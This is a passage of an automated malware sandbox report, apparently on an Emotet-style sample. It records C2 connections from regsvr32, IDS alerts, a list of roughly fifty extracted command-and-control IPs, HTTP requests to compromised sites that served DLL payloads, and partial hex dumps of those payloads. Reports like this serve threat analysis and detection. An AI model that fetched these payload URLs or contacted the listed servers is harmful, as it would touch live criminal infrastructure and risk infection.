              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49703 -> 81.68.152.197:80

              Networking

              barindex
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.63.99.23 7080
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.255.211.88 443
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443
              Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:63177 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49705 -> 173.255.211.88:443
              Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49709 -> 45.63.99.23:7080
              Source: TrafficSnort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.3:49712 -> 182.162.143.56:443
              Source: Malware configuration extractorIPs: 173.255.211.88:443
              Source: Malware configuration extractorIPs: 45.63.99.23:7080
              Source: Malware configuration extractorIPs: 182.162.143.56:443
              Source: Malware configuration extractorIPs: 91.187.140.35:8080
              Source: Malware configuration extractorIPs: 212.24.98.99:8080
              Source: Malware configuration extractorIPs: 119.59.103.152:8080
              Source: Malware configuration extractorIPs: 45.235.8.30:8080
              Source: Malware configuration extractorIPs: 172.104.251.154:8080
              Source: Malware configuration extractorIPs: 72.15.201.15:8080
              Source: Malware configuration extractorIPs: 169.57.156.166:8080
              Source: Malware configuration extractorIPs: 103.75.201.2:443
              Source: Malware configuration extractorIPs: 213.239.212.5:443
              Source: Malware configuration extractorIPs: 164.90.222.65:443
              Source: Malware configuration extractorIPs: 201.94.166.162:443
              Source: Malware configuration extractorIPs: 94.23.45.86:4143
              Source: Malware configuration extractorIPs: 183.111.227.137:8080
              Source: Malware configuration extractorIPs: 186.194.240.217:443
              Source: Malware configuration extractorIPs: 107.170.39.149:8080
              Source: Malware configuration extractorIPs: 147.139.166.154:8080
              Source: Malware configuration extractorIPs: 5.135.159.50:443
              Source: Malware configuration extractorIPs: 206.189.28.199:8080
              Source: Malware configuration extractorIPs: 104.168.155.143:8080
              Source: Malware configuration extractorIPs: 129.232.188.93:443
              Source: Malware configuration extractorIPs: 82.223.21.224:8080
              Source: Malware configuration extractorIPs: 103.43.75.120:443
              Source: Malware configuration extractorIPs: 103.132.242.26:8080
              Source: Malware configuration extractorIPs: 139.59.56.73:8080
              Source: Malware configuration extractorIPs: 164.68.99.3:8080
              Source: Malware configuration extractorIPs: 202.129.205.3:8080
              Source: Malware configuration extractorIPs: 167.172.199.165:8080
              Source: Malware configuration extractorIPs: 110.232.117.186:8080
              Source: Malware configuration extractorIPs: 209.97.163.214:443
              Source: Malware configuration extractorIPs: 167.172.253.162:8080
              Source: Malware configuration extractorIPs: 1.234.2.232:8080
              Source: Malware configuration extractorIPs: 159.65.88.10:8080
              Source: Malware configuration extractorIPs: 95.217.221.146:8080
              Source: Malware configuration extractorIPs: 153.92.5.27:8080
              Source: Malware configuration extractorIPs: 91.207.28.33:8080
              Source: Malware configuration extractorIPs: 188.44.20.25:443
              Source: Malware configuration extractorIPs: 153.126.146.25:7080
              Source: Malware configuration extractorIPs: 163.44.196.120:8080
              Source: Malware configuration extractorIPs: 172.105.226.75:8080
              Source: Malware configuration extractorIPs: 115.68.227.76:8080
              Source: Malware configuration extractorIPs: 159.65.140.115:443
              Source: Malware configuration extractorIPs: 139.59.126.41:443
              Source: Malware configuration extractorIPs: 197.242.150.244:8080
              Source: Malware configuration extractorIPs: 45.176.232.124:443
              Source: Malware configuration extractorIPs: 45.118.115.99:8080
              Source: Malware configuration extractorIPs: 149.56.131.28:8080
              Source: Malware configuration extractorIPs: 79.137.35.198:8080
              Source: Malware configuration extractorIPs: 173.212.193.249:8080
              Source: Malware configuration extractorIPs: 160.16.142.56:8080
              Source: Malware configuration extractorIPs: 159.89.202.34:443
              Source: Malware configuration extractorIPs: 185.4.135.165:8080
              Source: Joe Sandbox ViewASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
              Source: Joe Sandbox ViewASN Name: INPL-IN-APIshansNetworkIN INPL-IN-APIshansNetworkIN
              Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
              Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
              Source: global trafficHTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56
              Source: global trafficHTTP traffic detected: POST /qqvehgyxm/bitss/ktcpnaio/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 304Host: 182.162.143.56
              Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
              Source: Joe Sandbox ViewIP Address: 103.132.242.26 103.132.242.26
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:26:51 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveX-Powered-By: PHP/7.1.5Set-Cookie: 637136ebdcf92=1668364011; expires=Sun, 13-Nov-2022 18:27:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:26:51 GMTExpires: Sun, 13 Nov 2022 18:26:51 GMTContent-Disposition: attachment; filename="EvvmhfKiKFhKrSuHfBq.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?lllllll/ll2ll"l
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:27:03 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveSet-Cookie: 637136f7d44c4=1668364023; expires=Sun, 13-Nov-2022 18:28:03 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:27:03 GMTExpires: Sun, 13 Nov 2022 18:27:03 GMTContent-Disposition: attachment; filename="2yXcjy57oZTTUNweDidCGUY.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f6 07 00 00 00 e0 06 00 00 08 00 00 00 94 06 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?ll
              Source: global trafficHTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive
              Source: global trafficTCP traffic: 192.168.2.3:49709 -> 45.63.99.23:7080
              Source: unknownNetwork traffic detected: IP country count 24
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Nov 2022 18:26:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 173.255.211.88
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 45.63.99.23
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
              Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/
              Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415143218.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/
              Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F
              Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012973980.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416244353.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/tkafmhcgcid/
              Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/tkafmhcgcid//~G
              Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927895860.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/
              Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/2
              Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/b
              Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/
              Source: regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%
              Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/
